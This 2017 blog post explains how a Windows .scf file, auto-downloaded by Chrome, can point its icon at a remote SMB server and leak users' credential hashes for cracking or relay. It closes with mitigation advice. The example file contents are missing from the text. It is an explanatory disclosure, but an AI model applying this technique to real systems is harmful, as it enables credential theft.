Saturday 1 July 2017

How windows credentials can be stolen via Google Chrome

How Windows 7/8.1 and Windows 10 credentials can be stolen via Google Chrome

Attacks that are designed to leak user authentication data using the SMB protocol on Windows has been an everlasting issue and though its been exploited in a number of ways, has always been restricted to local area networks. One of rare displays of research being conducted in this domain was presented by Jonathan Brossard and Hormazd Billimoria at the Black Hat security conference in 2015.
How Windows 7/8.1 and Windows 10 credentials can be stolen via Google Chrome

However, there have been no publicly demonstrated attacks meant to steal user credentials that utilize the SMB protocol on any other platform besides Internet Explorer and the new Edge in the past decade or so. This article gets into a theoretical area of how such an attack can be used to leak user authentication data by utilizing what is currently the world's most popular browser - Google Chrome.

On default settings, Chrome will automatically download files without prompting for a download location for files it deems safe. It will simply use the preset location. While this might not be an ideal approach from a security standpoint, it is convenient and isn't really dangerous behavior considering every downloaded file has to be run by a user manually, before it can do anything. However, what if there was a file that could run without any user interaction?

The Loophole

A Windows Explorer Shell Command File (.scf) is a lesser known file format that has existed since Windows 98. Most Windows users came across it in Windows 98/ME/NT/2000/XP  when its primary use was as a "show desktop" shortcut. It is basically a text file with a with a section that determines the command that needs to be run and an icon file location. The commands are restricted to running Windows explorer and toggling the desktop. An example of an scf file :

The icon location is resolved as soon as the file in shown in the windows explorer. Setting the icon location to an SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares. The same resolution, however, also happens for a Windows LNK file. What is the difference then? Chrome forces a .download extension to the LNK file but not to the SCF file. As we have mentioned above, this will allow the file to run as well as be downloaded without user interaction.

SCF file can be used to trick Windows into an authentication attempt to a remote SMB server. Such an SCF file will require only 2 lines, viz.


The file will therefore theoretically be able to contact the SMB server and trick the machine into an authentication request. At this point, the attacker can make the server capable of capturing the user name and password hash and use it to crack the actual password. In a different scenario, an attacker could simply divert the user connection onto a different service that is expected to accept the same user credentials such as Microsoft Exchange Services used for Outlook thereby, enabling the attacker to impersonate the user without the user having even a hint of suspicion.

At this point, we need to also mention that an SCF file will appear extension-less in Windows Explorer when viewed. For example, a file Image.jpg.scf will actually appear to be Image.jpg when viewed. Thus, its very hard for a user to notice an SCF file. Also, most anti-virus software, do not flag an SCF file as malicious, so do not expect your anti-virus to come to the aid here.

Potential Impact

It's needless to specify what a negative impact having your credentials leaked can have. This gets even more serious when we consider than most users on Windows 8 and above use a Microsoft Account rather than a local account.  This means that the same password is likely being used for all of your Microsoft services including Skype, XBox, Office 365, One Drive, etc. This can end up being a nightmare for individuals that use an Outlook account for their work emails, potentially allowing a hacker access to your corporation's data and network.

Even if the attacker manages to get just the password hash, the process of password cracking has improved in recent times. The hashcat benchmark for a single Nvidia GTX 1080 card is around 1600 MH/s. That’s 1.6 billion hashes per second. Even without doing the math, one can see that it is realistically possible for the attacker to guess your password from just the hash.

Our Recommendation

You need to do the following steps to disable automatic downloads in Chrome. Settings -> Show advanced settings -> Check the Ask where to save each file before downloading option. Currently, all an attacker needs to do is to get the user to visit the server. It doesn't even matter if the user isn't the administrator on the machine for the attack to work. The measures that need to be taken depend on affected users network environment and range from simple host level hardening and configuring perimeter firewall rules to applying additional security measures such as SMB packet signing. As long as possible, corporates should restrict SMB data to within their networks. Hopefully, Google will patch this loophole now that it has been made public knowledge.

Share this post
  • Share to Facebook
  • Share to Twitter
  • Share to Google+
  • Share to Stumble Upon
  • Share to Evernote
  • Share to Blogger
  • Share to Email
  • Share to Yahoo Messenger
  • More...


:) :-) :)) =)) :( :-( :(( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ :-$ (b) (f) x-) (k) (h) (c) cheer

Posts RSSComments RSSBack to top
© 2013 ComboUpdates - Powered by Blogger
Released under Creative Commons 3.0 CC BY-NC 3.0